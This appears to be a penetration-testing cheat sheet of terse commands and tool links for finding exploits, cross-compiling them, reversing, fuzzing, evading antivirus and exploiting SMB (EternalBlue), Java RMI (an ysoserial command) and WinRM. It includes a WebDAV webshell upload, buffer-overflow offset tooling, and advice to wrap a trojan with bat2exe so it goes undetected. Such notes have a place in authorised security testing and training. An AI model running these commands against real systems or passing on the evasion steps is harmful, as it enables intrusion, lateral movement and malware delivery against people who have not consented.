How to find exploits
In Kali Linux:
searchsploit <SERVICE NAME>
Google:
site:exploit-db.com APP VERSION
linux-exploit-suggester.sh -k 2.6.9
windows-exploit-suggester.py -i <systeminfo file>
linuxprivchecker.py
NULL session
net use \\$IP\ipc$ "" "/user:"
WebDAV
cadaver http://$IP dav:/> put webshell.aspx
Compilers
To crosscompile windows exploits in linux:
First install the package:
apt-get install mingw-w64
Command line for C:
i686-w64-mingw32-gcc -lws2_32 -o 100 100.c
Useful flags:
gcc -l ws2_32 -l mswsock
Command line for C++:
i686-mingw32-g++ main.cpp -o main -static
To obfuscate a python or bat script:
- py2exe: To obfuscate a python program http://www.py2exe.org/
- bat2exe: To obfuscate a BAT program
Reversing in Linux
Tools:
- ltrace
- strace
- strings
- binwalk
- radare2 (IDA for Linux) https://github.com/radare/radare2
- objdump
radare2
Useful commands for radare2:
is: Show symbols iS: Show sections ii: Show imports iI: Binary info ia: Show all info i?: All commands starting with i
egg-hunter
/usr/share/metasploit-framework/tools/exploit/egghunter.rb -f python -e W00T
Buffer Overflow offsets:
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 256 /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 256 -q 773870B4
Reversing in Windows
Tools:
- IDA Pro
- OllyDbg
- Immunity Debugger
- https://github.com/corelan/mona Corelan Repository for mona.py
- http://www.rohitab.com/apimonitor API Monitor is a free software that lets you monitor and control API calls made by applications and services. Its a powerful tool for seeing how applications and services work or for tracking down problems that you have in your own applications
Reversing .NET
- https://github.com/0xd4d/dnSpy .NET debugger and assembly editor
Fuzzing
Linux
- sfuzz (kali)
- radamsa
- spike
Windows
AFL is a popular fuzzing tool for coverage-guided fuzzing. The tool combines fast target execution with clever heuristics to find new execution paths in the target binary. It has been successfully used to find a large number of vulnerabilities in real products.
AV Evasion
- Veil: Encrypts/Encode/Obfuscate msfvenom-like payloads
Thanks https://twitter.com/ReneFreingruber/status/1031140505453842432 @ReneFreingruber
To remove ”/var/lib/veil” strings and make reverse engineering harder:
-gcflags=-trimpath=/var/lib/veil -asmflags=-trimpath=/var/lib/veil
Other tools:
- https://www.obsidium.de/show/download/en Packer
- bat2exe
Do a bat script with your trojan and use bat2exe to get an FUD to trojanize an exe or service.
https://github.com/islamadel/bat2exe/blob/master/upload/bat2exe.exe - Phantom evasion
https://github.com/oddcod3/Phantom-Evasion
Interacts with msfvenom.
SMB exploitation
Eternalblue (Target: Windows 7 and Server 2008 R2 (x64) All Service Packs):
use exploit/windows/smb/ms17_010_eternalblue
nmap -sS -T4 --open -p 139,445 --script=smb-vuln-conficker,smb-vuln-cve2009-3103,smb-vuln-ms06-025,smb-vuln-ms07-029,smb-vuln-ms08-067,smb-vuln-ms10-054,smb-vuln-ms10-061,smb-vuln-regsvc-dos --script-args=unsafe=1 $IP/24
References:
Java RMI exploitation
Nmap will recognize it as:
XXXX/tcp open rmiregistry Java RMI
Exploiting RMI
With nmap:
nmap --script=rmi-vuln-classloader -p 1099 $IP nmap --script=rmi-dumpregistry -p 1099 $IP
With metasploit:
use exploit/multi/misc/java_rmi_server
With ysoserial:
java -cp ysoserial.jar ysoserial.RMIRegistryExploit $IP 1098 CommonsCollections1 calc.exe
With java monitoring and performance console (OS performance and application parameters):
jconsole
WinRM exploitation
Commands:
winrs -r:$HOST $CMD Test-WSMan -ComputerName $HOST
More info about WinRM lateral movement: https://www.hackingarticles.in/winrm-penetration-testing/